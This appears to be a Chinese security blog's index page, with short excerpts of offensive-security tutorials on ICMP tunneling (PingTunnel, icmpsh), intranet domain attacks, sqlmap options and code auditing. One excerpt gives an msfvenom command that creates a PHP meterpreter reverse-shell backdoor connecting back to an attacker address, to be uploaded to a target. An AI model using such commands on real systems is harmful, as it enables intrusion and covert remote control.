2020年2月21日
网络层隧道构建之PingTunnel
摘要: 官方下载链接:http://freshmeat.sourceforge.net/projects/ptunnel/ 解压一下 tar -zxf PingTunnel-0.72.tar.gz 安装 make&&make install 提示我们缺少pcap包,那我们安装一下 wget http://w 阅读全文
posted @ 2020-02-21 18:03 Ca1m 阅读(1862) 评论(0) 推荐(0) 编辑
内网ICMP隧道构建之icmpsh
摘要: 下载地址: https://github.com/inquisb/icmpsh#usage kali下载 git clone https://github.com/inquisb/icmpsh.git 安装依赖包 apt-get install python-impacket 关闭本地ICMP的应答 阅读全文
posted @ 2020-02-21 14:38 Ca1m 阅读(976) 评论(0) 推荐(0) 编辑
Python命令开启http.server服务器
摘要: python -m SimpleHTTPServer 默认的端口号是8000, 服务器根目录就是运行python命令的工作目录 如果是python3版本: 则试一下命令: python -m http.server 用http://127.0.0.1:8000即可访问目录下内容 服务器关闭:1) d 阅读全文
posted @ 2020-02-21 14:05 Ca1m 阅读(1777) 评论(0) 推荐(0) 编辑
2020年2月19日
msf建立php反弹shell
摘要: 一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下as 阅读全文
posted @ 2020-02-19 12:32 Ca1m 阅读(5351) 评论(0) 推荐(0) 编辑
2020年2月18日
内网实战入侵演练,拿域控
摘要: 基本信息 作 者: licong 创建时间: 2019年11月11日 15:29 标 签: APT攻击 | Kill Chain 描述 基本信息 作者:licong 环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为 阅读全文
posted @ 2020-02-18 20:16 Ca1m 阅读(791) 评论(0) 推荐(0) 编辑
2020年2月13日
内网连通性判断
摘要: ICMP协议 ping ip TCP协议 nc ip port HTTP协议 curl ip:port DNS协议 nslookup www.baidu.com vps-ip dig @vps-ip www.baidu.com 阅读全文
posted @ 2020-02-13 20:39 Ca1m 阅读(341) 评论(0) 推荐(0) 编辑
2020年2月11日
代码审计基础
摘要: 环境准备:phpstudy来搭建web服务、sublime作为代码编辑器(notepad++和phpstorm等都可以)、fortity和rips:静态扫描工具、beyond compare文本比较工具、seay代码审计工具。 挖掘思路: 敏感函数回溯参数。高效,通过搜索敏感函数的关键字,快速挖掘想 阅读全文
posted @ 2020-02-11 19:59 Ca1m 阅读(206) 评论(0) 推荐(0) 编辑
2020年2月10日
内网学习笔记之内网基础篇
摘要: 内网知识概念 工作组 域 这里面包括域、域控制器(DC)、单域、父域和子域、域树、域森林、DNS域名服务器、 活动目录(AD) 主要功能:账号集中管理、软件集中管理、环境集中管理、增强安全性、更可靠。 AD和DC的区别 内网的一个计算机装了AD就成了DC 安全域的划分 域中计算机的分类。 域控制器 阅读全文
posted @ 2020-02-10 17:48 Ca1m 阅读(352) 评论(0) 推荐(0) 编辑
2019年4月26日
Sqlmap常用命令大全
摘要: 1 Options(选项) -h,--help 显示帮助消息-hh 显示详细帮助-version -v VERBOSE 详细级别 0-6 默认12 Target 目标-u URL--url=URL-g GOOGLEDORK3 Request-r REQUESTFILE 从一个文件中载入HTTP请求- 阅读全文
posted @ 2019-04-26 15:23 Ca1m 阅读(1005) 评论(0) 推荐(0) 编辑
2019年4月16日
kali获得windows的shell后乱码
摘要: 输入 chcp 65001 阅读全文
posted @ 2019-04-16 15:27 Ca1m 阅读(544) 评论(0) 推荐(0) 编辑